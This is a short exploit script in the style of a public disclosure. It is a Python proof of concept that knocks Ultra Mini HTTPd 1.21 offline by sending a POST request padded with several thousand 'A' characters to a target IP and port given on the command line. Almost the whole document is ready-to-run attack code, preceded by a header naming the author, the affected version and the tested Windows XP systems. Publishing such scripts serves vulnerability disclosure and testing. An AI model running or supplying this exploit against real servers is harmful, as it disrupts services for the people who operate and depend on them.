# Exploit Title: Ultra Mini HTTPd 1.21 - POST - Denial of Service (DoS) # Discovery by: Fagner Lima - Aka r3ng4f # Discovery Date: 2024-1016 # Vendor Homepage: https://acme.com/ # Software Link: https://acme.com/ # Notification vendor: Yes reported # Tested Version: Ultra Mini HTTPd 1.21 # Tested on: Window XP Professional - Service Pack 2 and 3 - English # Vulnerability Type: Denial of Service (DoS) import socket import sys import os # Clear the console depending on the system def clear_console(): if os.name == 'nt': # For Windows os.system('cls') else: # For Mac and Linux os.system('clear') # Intro text def intro(): print("***************************************************") print("* Ultra Mini HTTPd 1.21 - Denial of Service *") print("* *") print("* Coded by Fagner Lima - Aka r3ng4f *") print("* *") print("* e-mail: fagner.alex@gmail.com *") print("* *") print("***************************************************") # Main function to handle IP and port arguments def main(): if len(sys.argv) != 3: print("\nUsage: {} <ip> <port>".format(sys.argv[0])) sys.exit(-1) ip = sys.argv[1] port = int(sys.argv[2]) return ip, port # Function to exploit the vulnerability def exploit(ip, port): print("[+] Exploiting...") buffer = "\x41" * 192 payload = 'A' * 5438 + buffer try: # Connect to the server with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.connect((ip, port)) request = f"POST / {payload} HTTP/1.1\r\nHost:{ip}\r\n\r\n" s.send(request.encode()) print("[+] Exploit sent successfully!") except Exception as e: print(f"[-] Failed to connect: {e}") # Run the exploit if __name__ == "__main__": clear_console() intro() ip, port = main() exploit(ip, port)